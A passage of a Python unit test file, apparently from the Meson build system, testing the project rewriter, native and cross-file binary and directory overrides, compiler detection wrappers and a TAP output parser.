self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
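    # Illustrative sketch only (not part of the original test suite): a call such as
    #   self.helper_create_native_file({'binaries': {'bash': '/path/to/wrapper'}})
    # (the path is hypothetical) writes a file containing
    #   [binaries]
    #   bash='/path/to/wrapper'
    # and returns its path, ready to be passed to meson via --native-file.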
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
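    # Illustrative sketch only (not part of the original test suite): e.g.
    #   self.helper_create_binary_wrapper('bash', version='12345')
    # generates a small python script that prints "12345" and exits when invoked
    # with --version, and otherwise forwards its arguments to the real 'bash'
    # (with an extra .bat shim on Windows, as implemented above).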
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
            raise unittest.SkipTest('No llvm-config installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
            # We may not have python2 installed; check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
    This is mainly aimed at testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
    AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
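# Illustrative sketch only (not part of the original script): for a plain
# (non-Apple) Clang compiler object reporting version 9.0, a hypothetical call
#   _clang_at_least(compiler, '>=3.8.0', '>=8.0')
# returns True, because only the first (regular Clang) bound is consulted.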
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
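def _convert_args_example():
    # Illustrative sketch only, not part of the original script: shows the
    # "ClassName.test_name" -> pytest "-k" translation done by convert_args().
    # The test name below is hypothetical.
    result = convert_args(['-v', 'AllPlatformTests.test_something'])
    assert result == ['-v', '-k', 'AllPlatformTests and test_something']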
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
